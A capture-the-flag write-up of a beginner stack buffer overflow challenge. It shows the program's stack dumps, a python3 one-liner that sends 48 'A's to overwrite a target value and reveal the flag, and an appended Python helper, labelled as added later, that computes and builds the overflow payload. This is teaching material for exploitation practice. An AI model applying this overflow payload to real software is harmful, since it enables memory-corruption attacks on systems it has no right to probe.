Getting Started
3 minute read
In this challenge we are asked to exploit a basic Buffer Overflow vulnerability; the program itself gives us instructions and examples:
$ nc 178.62.11.21 31609
Stack frame layout
| . | <- Higher addresses
| . |
|_____________|
| | <- 64 bytes
| Return addr |
|_____________|
| | <- 56 bytes
| RBP |
|_____________|
| | <- 48 bytes
| target |
|_____________|
| | <- 40 bytes
| alignment |
|_____________|
| | <- 32 bytes
| Buffer[31] |
|_____________|
| . |
| . |
|_____________|
| |
| Buffer[0] |
|_____________| <- Lower addresses
[Addr] | [Value]
-------------------+-------------------
0x00007ffe1d81dbd0 | 0x0000000000000000 <- Start of buffer
0x00007ffe1d81dbd8 | 0x0000000000000000
0x00007ffe1d81dbe0 | 0x0000000000000000
0x00007ffe1d81dbe8 | 0x0000000000000000
0x00007ffe1d81dbf0 | 0x6969696969696969 <- Dummy value for alignment
0x00007ffe1d81dbf8 | 0x00000000deadbeef <- Target to change
0x00007ffe1d81dc00 | 0x000055a7c5e33800 <- Saved rbp
0x00007ffe1d81dc08 | 0x00007f339c259c87 <- Saved return address
0x00007ffe1d81dc10 | 0x0000000000000001
0x00007ffe1d81dc18 | 0x00007ffe1d81dce8
After we insert 4 "A"s, (the hex representation of A is 0x41), the stack layout like this:
[Addr] | [Value]
-------------------+-------------------
0x00007ffe1d81dbd0 | 0x0000000041414141 <- Start of buffer
0x00007ffe1d81dbd8 | 0x0000000000000000
0x00007ffe1d81dbe0 | 0x0000000000000000
0x00007ffe1d81dbe8 | 0x0000000000000000
0x00007ffe1d81dbf0 | 0x6969696969696969 <- Dummy value for alignment
0x00007ffe1d81dbf8 | 0x00000000deadbeef <- Target to change
0x00007ffe1d81dc00 | 0x000055a7c5e33800 <- Saved rbp
0x00007ffe1d81dc08 | 0x00007f339c259c87 <- Saved return address
0x00007ffe1d81dc10 | 0x0000000000000001
0x00007ffe1d81dc18 | 0x00007ffe1d81dce8
After we insert 4 "B"s, (the hex representation of B is 0x42), the stack layout looks like this:
[Addr] | [Value]
-------------------+-------------------
0x00007ffe1d81dbd0 | 0x4242424241414141 <- Start of buffer
0x00007ffe1d81dbd8 | 0x0000000000000000
0x00007ffe1d81dbe0 | 0x0000000000000000
0x00007ffe1d81dbe8 | 0x0000000000000000
0x00007ffe1d81dbf0 | 0x6969696969696969 <- Dummy value for alignment
0x00007ffe1d81dbf8 | 0x00000000deadbeef <- Target to change
0x00007ffe1d81dc00 | 0x000055a7c5e33800 <- Saved rbp
0x00007ffe1d81dc08 | 0x00007f339c259c87 <- Saved return address
0x00007ffe1d81dc10 | 0x0000000000000001
0x00007ffe1d81dc18 | 0x00007ffe1d81dce8
◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉
◉ ◉
◉ Fill the 32-byte buffer, overwrite the alginment address and the "target's" 0xdeadbeef value. ◉
◉ ◉
◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉
>>
Basically, they show us how the input data is stored on the stack and ask us to modify the values 0x6969696969696969 and 0x00000000deadbeef present on the stack through the Buffer Overflow vulnerability. If we count the number of bytes needed, we see that it is 48 (6 * 8): four 8-byte slots for the 32-byte buffer, one for the alignment value and one for the target. So we have to enter exactly 48 characters, for example the letter A:
$ python3 -c 'print("A" * 48)'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[Addr] | [Value]
-------------------+-------------------
0x00007ffe1d81dbd0 | 0x4141414141414141 <- Start of buffer
0x00007ffe1d81dbd8 | 0x4141414141414141
0x00007ffe1d81dbe0 | 0x4141414141414141
0x00007ffe1d81dbe8 | 0x4141414141414141
0x00007ffe1d81dbf0 | 0x4141414141414141 <- Dummy value for alignment
0x00007ffe1d81dbf8 | 0x4141414141414141 <- Target to change
0x00007ffe1d81dc00 | 0x000055a7c5e33800 <- Saved rbp
0x00007ffe1d81dc08 | 0x00007f339c259c87 <- Saved return address
0x00007ffe1d81dc10 | 0x0000000000000001
0x00007ffe1d81dc18 | 0x00007ffe1d81dce8
HTB{b0f_tut0r14l5_4r3_g00d}
[-] You failed!
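To check the 48-byte count derived above mechanically, here is an added Python helper that is not part of the original writeup: it parses the [Addr] | [Value] table the challenge prints (embedded below as a constructed copy of the values shown above), computes the distance from the buffer start to the target slot, and confirms that 48 bytes end exactly before the saved rbp, which is why the program still returns normally after the overwrite. The function names and the label matching are my own choices.

```python
import re

# Constructed copy of the stack dump the challenge prints; the addresses and
# values are the ones shown in the writeup, only the embedding is ours.
STACK_DUMP = """\
[Addr] | [Value]
-------------------+-------------------
0x00007ffe1d81dbd0 | 0x0000000000000000 <- Start of buffer
0x00007ffe1d81dbd8 | 0x0000000000000000
0x00007ffe1d81dbe0 | 0x0000000000000000
0x00007ffe1d81dbe8 | 0x0000000000000000
0x00007ffe1d81dbf0 | 0x6969696969696969 <- Dummy value for alignment
0x00007ffe1d81dbf8 | 0x00000000deadbeef <- Target to change
0x00007ffe1d81dc00 | 0x000055a7c5e33800 <- Saved rbp
0x00007ffe1d81dc08 | 0x00007f339c259c87 <- Saved return address
"""

SLOT = 8  # every row of the dump is one 8-byte, little-endian stack slot
ROW = re.compile(r"^(0x[0-9a-f]+)\s*\|\s*(0x[0-9a-f]+)(?:\s*<-\s*(.*))?$")


def parse_dump(text):
    """Return (address, value, label) per row; header and rule lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            rows.append((int(m.group(1), 16), int(m.group(2), 16),
                         (m.group(3) or "").strip()))
    return rows


def find_slot(rows, label):
    """Address of the slot whose annotation matches `label` (case-insensitive)."""
    for addr, _value, lab in rows:
        if lab.lower() == label.lower():
            return addr
    raise ValueError(f"no slot labelled {label!r}")


def bytes_to_cover(rows):
    """Bytes, counted from the buffer start, that end at the end of the target slot."""
    return find_slot(rows, "Target to change") - find_slot(rows, "Start of buffer") + SLOT


def safe_budget(rows):
    """Bytes that can be written before the saved rbp (and return address) are touched."""
    return find_slot(rows, "Saved rbp") - find_slot(rows, "Start of buffer")


def build_payload(rows, fill=b"A"):
    """Exactly enough filler to rewrite the alignment and target slots, nothing past them."""
    n = bytes_to_cover(rows)
    assert n <= safe_budget(rows), "payload would corrupt saved rbp / return address"
    return fill * n
```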